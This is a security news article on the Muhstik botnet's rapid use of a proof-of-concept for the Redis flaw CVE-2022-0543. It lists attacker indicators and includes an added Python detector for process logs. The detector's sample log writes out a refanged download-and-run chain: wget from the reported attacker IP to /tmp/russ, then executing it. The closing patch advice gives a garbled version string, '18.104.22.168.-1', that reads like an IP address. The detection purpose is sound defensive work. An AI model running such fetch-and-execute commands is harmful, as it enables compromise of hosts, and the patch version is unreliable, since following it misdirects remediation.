The Muhstik botnet gang wasted no time in adopting the researchers’ proof-of-concept exploit for the critical Lua sandbox flaw. Researchers released the PoC on March 10, and the botnet group was using it in distributed denial-of-service operations the next day.
Based on the reports, the threat actors targeted a critical vulnerability in the Redis Debian packages, tracked as CVE-2022-0543, which affects the Debian and Ubuntu Linux distributions.
The attack process begins with an attempt to download the primary payload, dubbed Russia[.]sh, using curl or wget from the threat actor-controlled IP address (106[.]246[.]224[.]219).
The researchers also noticed that the threat actors saved the script as /tmp/russ and used it to download and run Linux binaries identified as strains of the Muhstik botnet.
Once installed, the bot connects to an Internet Relay Chat server to receive commands, including executing shell instructions, downloading files, carrying out flood attacks, and brute-forcing SSH logins.
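As an added detection example (not from the report or the researchers), the indicators in the attack chain above can be refanged and matched against process-execution log lines; the log lines and their field layout are constructed for illustration:

```python
import re

# Indicators exactly as the write-up above gives them, in defanged form.
INDICATORS = {
    "payload_ip": "106[.]246[.]224[.]219",
    "payload_name": "Russia[.]sh",
    "dropped_path": "/tmp/russ",
}

def refang(value: str) -> str:
    """Turn the '[.]' notation used in threat reports back into a literal dot."""
    return value.replace("[.]", ".")

# Behaviours from the report: a curl/wget fetch of the script from the
# attacker IP, the script saved as /tmp/russ, then executed.
DOWNLOADER_RE = re.compile(r"\b(?:curl|wget)\b")
# Match the drop path as a whole token so /tmp/russell or /tmp/russ.log is not a hit.
DROP_PATH_RE = re.compile(re.escape(INDICATORS["dropped_path"]) + r"(?![\w.-])")

def scan_line(line: str) -> list:
    """Return the names of the report's indicators seen on one log line."""
    hits = []
    lowered = line.lower()
    if DOWNLOADER_RE.search(lowered) and refang(INDICATORS["payload_ip"]) in line:
        hits.append("downloader_to_reported_ip")
    if refang(INDICATORS["payload_name"]).lower() in lowered:
        hits.append("reported_payload_name")
    if DROP_PATH_RE.search(line):
        hits.append("reported_drop_path")
    return hits

def scan_log(lines) -> list:
    """Return (line_number, hits) for every line carrying at least one indicator."""
    return [(n, hits) for n, line in enumerate(lines, 1) if (hits := scan_line(line))]

# Constructed sample lines in a process-execution log style; not real data.
SAMPLE_LOG = [
    "2022-03-11T10:02:13Z host1 exec uid=redis cmd=wget -q http://106.246.224.219/russia.sh -O /tmp/russ",
    "2022-03-11T10:02:14Z host1 exec uid=redis cmd=sh /tmp/russ",
    "2022-03-11T10:05:00Z host1 exec uid=root cmd=curl -s https://deb.debian.org/debian/dists/bullseye/InRelease",
    "2022-03-11T10:06:30Z host1 exec uid=alice cmd=tar xf /tmp/russell-backup.tar",
]

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

Only the two lines from the reported chain fire; the benign curl to a Debian mirror and the unrelated /tmp/russell-backup.tar path do not.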
The Muhstik botnet gang also used one of its previously observed IP addresses while testing the proof-of-concept provided by the researchers.
The researchers were able to attribute the campaign because the originating IP addresses of the attacks on the Redis servers are identical to those used in previous Muhstik attacks.
The IP address the researchers had previously tracked to Muhstik is 191[.]232[.]38[.]25, which the group also used in its most recent campaign in December 2021. In that campaign, the threat actors launched attacks by abusing the critical Apache Log4j vulnerability (CVE-2021-44228).
The Muhstik botnet had also targeted Confluence servers in September by exploiting CVE-2021-26084, again from the same IP address, and in each case it began abusing the new vulnerability within the shortest possible time.
Experts expect more attackers to exploit the newly disclosed flaw; users should therefore update to Redis package version 18.104.22.168.-1, or follow Ubuntu’s security bulletin or the Debian security advisory on the issue, to stay protected against this attack.